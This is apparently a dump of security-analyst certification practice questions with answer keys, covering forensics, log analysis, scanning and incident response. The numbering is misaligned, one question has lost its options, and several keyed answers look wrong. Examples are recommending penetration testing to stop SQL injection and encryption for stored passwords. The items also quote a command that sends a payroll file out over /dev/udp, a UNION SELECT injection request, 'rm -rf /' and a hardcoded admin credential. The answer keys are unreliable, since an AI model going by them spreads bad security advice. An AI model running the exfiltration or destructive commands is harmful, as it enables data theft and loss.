244. An investigation office seized and packaged electronic media evidence to ship to a specialized tab. Which of the following will help to identify data integrity loss?

a. Write blockers
b. Crime tape
c. Chain of custody
d. Tamper-proof seals
e. Incident from

Answer 245

d. Tamper-proof seals

Question 246

245. A junior forensic analyst is asked to take an image of a workstation that was compromised during a recent breach. The head of the CIRT is most concerned with ensuring that digital evidence is preserved during analysis. Which of the following tools would BEST accomplish this goal?

a. Hashing algorithm
b. Sealed evidence bag
c. Time stamping
d. Write blocker

Answer 246

b. Sealed evidence bag

Question 247

246. While examining server logs, a security analyst notices an additional process is running that is not required for the server’s function. Additionally, a key process on the server began crashing and automatically restarting dozens of times within a short time period until a patch was applied. Which of the following BEST describes what has happened?

a. The affected process is a result of a zero-day attack.
b. A busy server updated itself automatically.
c. The crashes made the security logs inaccurate.
d. A known vulnerability has been exploited.

Answer 247

d. A known vulnerability has been exploited.

Question 248

247.	** A security analyst is trying to interpret the results of the following scan:
Nmap -sS 192.168.1.11 -D 192.168.1.13 -p 22, 135,139,445,3389,4445,14000
Host is up (0.0010s latency)
Port State Service
22/tcp closed openSSH
135/tcp closed Msrpc
139/tcp closed Netbios-ssn
445/tcp closed Microsoft-ds
3389/tcp closed Ms-term-serv
4445/tcp closed Upnotifyp
14000/tcp closed Scotty-ft
Which of the following BEST describes the target?
a.	192.168.1.11 is running Linux
b.	192.168.1.11 is running Windows.
c.	192.168.1.13 is running Linux.
d.	192.168.1.13 is running Windows.

Answer 248

a. 192.168.1.11 is running Linux.

Question 249

248. The accounts payable department is having trouble processing a wire transfer online. Ann, an accountant, types in her password four times without success. Joe, her assistant, attempts to enter his password, but it fails as well. Which of the following best describes how the IT department should respond FIRST?

a. Segment the accounting department’s network and begin reviewing log files.
b. Notify law enforcement and initiate the incident response process.
c. Notify senior management and await further instruction before processing.
d. Contact the wire transfer company out-of-band and have the passwords changed.

Answer 249

d. Contact the wire transfer company out-of-band and have the passwords changed.

Question 250

249. An analyst notices the following vulnerabilities frequently occurred in scans over the past year:
     PenSSL < 1.1 0b
     Apache TomcatDefaultPassword
     These vulnerabilities frequently occur on servers that are part of a DevOps process and are easy to fix. Which of the following would identify why they keep showing up?

a. The DevOps process requires a specific version and default passwords for easy deployment to Tomcat.
b. These are development servers, so the services may be providing incorrect data to the scanner.
c. DevOps images need to be updated to the latest software versions.
d. The vulnerability trend over a year indicates the presence of an API.

Answer 250

d. The vulnerability trend over a year indicates the presence of an API.

Question 251

250.	While testing an organization’s password policy compliance, an analyst views the following report from a web server:
Employee ID Password Hash
656 1h738kb894nmd7653nb345576hg3j485
657 121h8kb8een6d7f5u73ew290pmn44466
658 1h738kb894nmd7653nb345576hg3j485
659 a17e8kk8v4n7d7663nb34hh79h73j485

Which of the following is the BEST recommendation to address these findings?

a. Update the password policy to ensure password complexity.
b. Migrate from MD5 to SHA-256 hashing.
c. Salt the employee’s passwords prior to hashing.
d. Store hashes in an encrypted format.

Answer 251

c. Salt the employee’s passwords prior to hashing.

Question 252

251. A company has been listed on the “plaintextoffenders.com” website as storing customer passwords in cleartext. This was discovered when customers reset their current passwords by clicking on a “forgotten password” link. Which of the following technical controls should the company implement on customer passwords to remediate this? (Select TWO).

a. SHA-256 hashing
b. Password salting
c. Reversible encryption
d. AES-GCM encryption
e. Disablement of password resets
f. Implementation of TLS

Answer 252

b. Password salting

d. AES-GCM encryption

Question 253

252. 2/17/2017 09:01:10 PM EDT dmayfair Invalid Password
     2/17/2017 09:01:14 PM EDT dmayfair Invalid Password
     2/17/2017 09:01:15 PM EDT amyers Invalid Password
     2/17/2017 09:01:22 PM EDT dmayfair Invalid Password
     2/17/2017 09:01:28 PM EDT dmayfair Invalid Password
     2/17/2017 09:01:35 PM EDT dmayfair Invalid Password
     2/17/2017 09:01:35 PM EDT amyers Password accepted
     2/17/2017 09:01:50 PM EDT dmayfair Password accepted
     The analyst next checks the identify management system and finds the following:
     Full Name User ID Role
     Aaron Myers amyers Executive, CFO
     Diane Mayfair dmayfair Office Staff, Reception
     Doug Smith dsmith Office Staff, Clearing

Which of the following should the analyst do NEXT?

a. Ask the help desk to contact Diane Mayfair for a password reset.
b. Follow up with the Chief Financial Officer (CFO) regarding his login issues.
c. Check logs for activities by the dmayfair account.
d. Contact Doug Smith to set up an account in the system.

Answer 253

b. Follow up with the Chief Financial Officer (CFO) regarding his login issues.

Question 254

253. During an incident investigation, a cybersecurity analyst finds the following assertion flagged by WAF and originating from a known mailing address. The targeted system is an internet-facing IdP?
     https: //idp.comptia.org

admin

Answer 254

d. The assertion indicates an attacker is trying to take advantage of an XML External Entity attack.

Question 255

254. A server is showing signs of irregular communication with a known threat actor’s IP range. The Chief Information Security Officer (CISO) has asked the analyst to capture a session with Wireshark for further analysis. The packet capture shows very small amounts of data being sent over ports 53 and 80 with “zero payload”. Which of the following common network symptoms does the represent?

a. Beckoning
b. Unusual traffic spiking
c. Data exfiltration
d. Malformed packet

Answer 255

a. Beckoning

Question 256

255. After a data leak, a company requires the sanitization of hard drives, rendering them unusable. Which of the following methods should the company use for the removal of data remanence?

a. Deleting
b. Reformatting
c. Degaussing
d. Zeroing

Answer 256

c. Degaussing

Question 257

256.	The Chief Information Security Officer (CISO) has asked the security analyst to examine abnormally high processor utilization on a key server. The output below is from the company’s research and development (R and D) server:
Hour Processor address
Busy
time (%)
Processor user
(sec)
Processor
emulation (sec)
Processor system
(sec)
System
wait
(msec)
Server
16:01:31 0 18.75 610 432 66 2823 Research
.01.R&D.
srv
1 29.55 765 370 298 2151 Research
.01.R&D.
srv
2 16.65 542 382 58 3030 Research
.01.R&D.
srv
3 13.86 453 322 46 6160 Research
.01.R&D.
srv
17:03:31 0 18.99 625 447 59 2205 Research
.01.R&D.
srv
1 22.52 605 342 215 1932 Research
.01.R&D.
srv
2 14.23 503 313 41 1785 Research
.01.R&D.
srv
3 12.81 417 299 32 1823 Research
.01.R&D.
srv
18:05:17 0 9.63 420 395 41 1287 Research
.01.R&D.
srv
1 13.35 302 294 62 1015 Research
.01.R&D.
srv
2 6.23 252 241 21 987 Research
.01.R&D.
srv
3 5.41 238 197 13 884 Research
.01.R&D.
srv
16:06:52 0 88.81 2440 1728 264 14115 Research
.01.R&D.
srv
1 76.23 3060 1240 901 10755 Research
.01.R&D.
srv
2 72.35 2168 987 216 10284 Research
.01.R&D.
srv
3 58.99 1912 802 208 9758 Research
.01.R&D.
srv

Which of the following actions should the security analyst take FIRST?

a. Initiate an investigation
b. Isolate the R&D server
c. Reimage the server
d. Determine availability

Answer 257

a. Initiate an investigation

Question 258

257. During a tabletop exercise, it is determined that a security analyst is required to ensure patching and scan reports are available during an incident, as well as documentation of all critical systems. To which of the following stakeholders should the analyst provide the reports?

a. Management
b. Affected vendors
c. Security operations
d. Legal

Answer 258

a. Management

Question 259

258. Joe, a user e to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .exe and .dll files are blocked. Which of the following tools would generate these logs?
     a. Antivirus
     b. HIPS
     c. Firewall
     d. Proxy

Answer 259

b. HIPS

Question 260

259. An organization subscribes to multiple third-party security intelligence feeds. It receives a notification from one of these feeds indicating a zero-day malware attack is impacting the SQL server prior to SP 2. The notification also indicates that infected systems attempt to communicate to external IP addresses on port 2718 to download the additional payload. After consulting with the organization’s database administrator, it is determined that there are several SQL servers that are still on SP 1, and none of the SQL servers would normally communicate over port 2718. Which of the following is the BEST mitigation step to unite the SQL servers that can be upgraded to SP 2 with minimal impact on the network?

a. Create alert rules on the IDS for all outbound traffic on port 2718 from IP addresses of the SQL servers running SQL SP1.
b. On the organization’s firewalls, create a new rule that blocks outbound traffic on port 2718 from the IP addresses of the servers running SQL1.
c. Place all the SQL servers running SP 1 on a separate subnet. On the firewalls, create a new rule blocking the connection to destination addresses external to the organization’s network.
d. On the SQL Servers running SP 1, install vulnerability scanning software.

Answer 260

c. Place all the SQL servers running SP 1 on a separate subnet. On the firewalls, create a new rule blocking the connection to destination addresses external to the organization’s network.

Question 261

260. Which of the following is the BEST way to share incident-related artifacts to provide non-repudiation?

a. Secure email
b. Encrypted USB drives
c. Cloud containers
d. Network folders

Answer 261

a. Secure email

Question 262

261. A security analyst received a threat report regarding a new TTP against Linux that utilizes a malicious process running with elevated privileges. Which of the following commands would MOST efficiently gather the appropriate information for analysis?

a. 1s -a1h /usr/bin/
b. 1s | grep root
c. tasklist | FIND root
d. ps aux | grep root

Answer 262

d. ps aux | grep root

Question 263

262. While reviewing web server logs, a security analyst notices the following code:
     GET http://testphp.comptia.org/profiles.php?id=-1 UNION SELECT 1,2,3 HTTP/1.1
     Host: testphp.comptia.org
     Which of the following would prevent this code from performing malicious actions?

a. Performing web application penetration testing
b. Requiring the application to use input validation
c. Disabling the use of HTTP and requiring the use of HTTPS
d. Installing a network firewall in front of the application

Answer 263

a. Performing web application penetration testing

Question 264

263. A company has multiple firewalls on its network. The security analyst remotes unto each firewall to review daily logs and discovers blocks of the logs are missing between midnight and 6:00 a.m. Nothing else is discovered during the examination. After reviewing the findings, which of the following should the analyst report to management?

a. The missing log files are not a concern, as nothing else was discovered missing. Management should consider changing the passwords for administrators who no longer work at the company so they cannot access the firewall.
b. The missing log files are purged after-hours to preserve space on the firewalls. Management should consider purchasing larger drives to prevent the log from being purged.
c. The missing log files pertain to someone who gained access and cleaned the tracks. Company management should deploy a SIEM system to offload the logs for protection.
d. The missing files indicate something has happened, but no details are discovered during the examination. The analyst should notify management an anomaly was found, but no damage occurred

Answer 264

b. The missing log files are purged after-hours to preserve space on the firewalls. Management should consider purchasing larger drives to prevent the log from being purged.

Question 265

264. A penetration tester recently came across an executable file that was developed in-house and used by administrators to remotely administrator sensitive systems. The tester ran ‘strings’ on the file and came up with the following output. This program cannot be run in DOS mode.
     .text
     .data
     Ntd11.d11
     Shell1132.d11
     User32.d11
     Net use \windc1\admin /user:windomain:admin1 p@ssw0rd1 /persistent
     …
     Which of the following recommendations should an analyst make to the testers?

a. Load the secure versions of standard Windows DLLs only.
b. Utilize base64 to enclose the string with the net use command.
c. Perform static application security testing on all binaries.
d. Use the windows DPAPI to encrypt the password string.

Answer 265

d. Use the windows DPAPI to encrypt the password string.

Question 266

265. A technician at a company’s retail store notifies an analyst that disk space is being consumed at a rapid rate on several registers. The uplink back to the corporate office is also saturated frequently. The retail location has no Internet access. An analyst then observes several occasional IPS alerts indicating a server at corporate has been communicating with an address on a watchlist. NetFlow data shows large quantities of data transferred at those times. Which of the following is MOST likely causing the issue?

a. A credit card processing file was declined by the card processor and caused transaction logs on the registers to accumulate longer than usual.
b. Ransomware on the corporate network has propagated from the corporate network to the registers and has begun encrypting files there.
c. Ransomware on the corporate network has propagated from the corporate network to the registers from the IP address indicated on the watchlist, generating large amounts of traffic and data storage.
d. Malware on a register is scraping credit card data and staging it on a server at the corporate office before uploading it to an attacker-controlled command and control server.

Answer 266

d. Malware on a register is scraping credit card data and staging it on a server at the corporate office before uploading it to an attacker-controlled command and control server.

Question 267

266. A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

a. nmap -A -sV 192.168.1.235
b. cat payrol.csv > /dev/udp/123.145.123.456/53
c. cat /etc/passwd
d. mysql -h 192.168.1.235 -u test -p

Answer 267

b. cat payrol.csv > /dev/udp/123.145.123.456/53

Question 268

267. Which of the following should be found within an organization’s acceptable use policy?

a. Passwords must be eight characters in length and contain at least one special character.
b. Customer data must be handled properly, stored on company servers, and encrypted when possible.
c. Administrator accounts must be audited monthly, and inactive accounts should be removed.
d. The consequences of violating the policy could include discipline up to and including termination.

Answer 268

d. The consequences of violating the policy could include discipline up to and including termination.

Question 269

268. .New regulations have come out that require a company to conduct vulnerability scans. Not wanting to be found with a vulnerability during an audit, the company wants the most accurate and complete vulnerability scan. Which of the following BEST meets this objective?

a. Regression scan
b. Port scan
c. SCAP scan
d. Agent-based scan

Answer 269

d. Agent-based scan

Question 270

269. A company has a large number of users who need to access corporate resources or networks from various locations. Many users have VPN access to the network, as well as wireless Internet access from BYOD approved systems, tablets, and smartphones. The users can also access corporate resources from an Internet-facing web portal; however, all of these services require a separate credential. Which of the following should the cybersecurity analysts recommend to aggregate and audit all logins while allowing the corporate directory services credentials to be shared across all of the services?

a. SAMI
b. Kerberos
c. SSO
d. RADIUS

Answer 270

c. SSO

Question 271

270. An organization wants to perform network scans to identify active hosts and vulnerabilities. Management places the highest priority to scans that mimic how an attack would progress. If time and resources allow, subsequent scans can be performed using different techniques and methods. Which of the following scans types and sequences would BEST suit the organization’s requirements?

a. Non-credentials scans followed by credential scans
b. Credentialed scans followed by compliance scans
c. Compliance scans followed by credentialed scans
d. Compliance scans followed by non- credential scans

Answer 271

a. Non-credentials scans followed by credential scans

Question 272

271. Which of the following vulnerabilities is MOST commonly found on a web proxy server?

a. Cache poisoning
b. Cross-site scripting
c. Directory traversal
d. SQL Injection

Answer 272

a. Cache poisoning

Question 273

272. A data center manager just received an SMS alert that a server cage was successful using an authorized code. The manager does not recall receiving a multifactor by email for scheduled maintenance on servers in the cage. Which of the following is the FIRST step the manager should make?
     a. Check the change management tags at the earliest convenience is determined if the change was authorized
     b. Remote access to the server and change the password to prevent the x from accessing the system
     c. Request a firewall administrator to implement an ACL to contain any potential damage
     d. Call the security guard to investigate the situation

Answer 273

d. Call the security guard to investigate the situation

Question 274

273. In comparison to non-industrial IT vendors, ICS equipment vendors generally:

a. Rely less on proprietary code in their hardware products
b. Have more mature software development models
c. Release software updates less frequently
d. Provide more extensive vulnerability reporting

Answer 274

c. Release software updates less frequently

Question 275

274. A security administrator is reviewing the following results of a vulnerability scan from a single host:
     BugTrack ID Name
     BID 19849 Ubuntu 5.10 /6.06 LTS /6.10 Mozilla vulnerabilities (USN-361)
     BID 10708 Microsoft Windows Tasks Scheduler remote overflow (841873)
     BID 14514 Vulnerability in printer spooler service could allow remote code execution (896423)
     BID 14513 Vulnerability in plug-and-play service could allow remote code execution (899588)

Which of the following BEST describes these scan results?

a. The Mozilla vulnerability is a false positive
b. The Task Schedule vulnerability is a false positive
c. The plug-and-play vulnerability is the lower priority
d. The printer spooler is the highest priority

Answer 275

a. The Mozilla vulnerability is a false positive

Question 276

275. An organization is working with a number of value-added resellers to scope and budget an upcoming networking infrastructure overhaul. During the vendor selection process, which of the following should the organization require vendors to provide to mitigate security issues that may arise in the supply chain?

a. Business continuity plan
b. SLAs with OEM suppliers
c. Installation and configuration procedures
d. Hardware authenticity verification procedures
e. Vendor risk analysis procedures

Answer 276

e. Vendor risk analysis procedures

Question 277

276. An analyst performed the following activities:
277. Review the security logs
278. Install a surveillance camera
279. Analyze trend reports

Which of the following job responsibilities is the analyst performing (Select TWO)?

a. Direct a security incident
b. Reduce the attack surface of the system
c. Implement monitoring controls
d. Harden network devices
e. Prevent unauthorized access
f. Encrypt the devices

Answer 277

b. Reduce the attack surface of the system

c. Implement monitoring controls

Question 278

277. The IT department at a growing law firm wants to begin using a third party vendor for vulnerability monitoring and mitigation. The executive director of the law firm wishes to outfit assumptions and expectations between the two companies. Which of the following documents would MOST likely be created to contain this information?

a. SLA
b. MOU
c. SOW
d. NDA

Answer 278

b. MOU

Question 279

278. A security analyst runs a scan and discovers several vulnerabilities. Which of the following should the analysts recommend to be fixed FIRST?

a. Unknown Service Detection: Banner Retrieval
b. FTP Server Detection
c. Samba NDR MS-RPC Request Heap-Based Remote Buffer Overflow
d. HTTP Methods Allowed (per-directory)
e. Web Server Uses Plain Text Authentication Forms

Answer 279

c. Samba NDR MS-RPC Request Heap-Based Remote Buffer Overflow

Question 280

279. After a forensic investigation, several hard drives are to be sanitized and reused. Which of the following commands will securely erase these drives and reset them to factory specifications?

a. dd bs-4096 if-/dev/zerp of-/dev/[mount]
b. Format [drive location]: /pl
c. mkfs.ext3 /dev/[mount]
d. Rm -rf /

Answer 280

a. dd bs-4096 if-/dev/zerp of-/dev/[mount]

Question 281

280. A company wants a security assessment of its corporate network, which is located in two buildings. The company does not want anyone to be aware of the assessment but wants the results provided to the CEO when the assessment is completed. Which of the following is the FIRST thing the company should do to fix the assessment?

a. Gather network information from the system administrator before the assessment
b. Ensure the company has signed and given permission for the assessment
c. Ask how they want to the documentation of the assessment
d. Ask where the team is to be located during the assessment

Answer 281

d. Ask where the team is to be located during the assessment

Question 282

281. During user acceptance testing of a company’s online banking application, the user enters some sample data and receives the following output:

FinancialWebApp.AccountDetails: Err2367, Database mismatch

At FinancialWebApp.SetPIIinDB() in C:\ FinancialWebApp\DBObjects.cs:line24
At FinancialWebApp.FormatData() in C:\ FinancialWebApp\FInObjects.cs.line 14
At FinancialWebApp.UserInput() in C:\ FinancialWebApp\FinObjects.ca:line 10
At FinancialWebApp.Program.Main(String[] args) in C:\ FinancialWebApp\Program.cs:line 13

Which of the following recommendations should be made to the software developers as a result of this output?

a. Stress the application
b. Ensure a mechanism exists for detailed log analysis
c. Sanitize user input from the debug logs
d. Use error handlers that do not display debugging information

Answer 282

d. Use error handlers that do not display debugging information

Question 283

282. Which of the following describes the role blue team members are assigned to fulfill?

a. Discover vulnerabilities in the deep in the dark web and report them to management
b. Attack the company system to discover vulnerabilities and advise management
c. Conduct penetration testing and report findings to management
d. Protect and defend company assets and advise management

Answer 283

d. Protect and defend company assets and advise management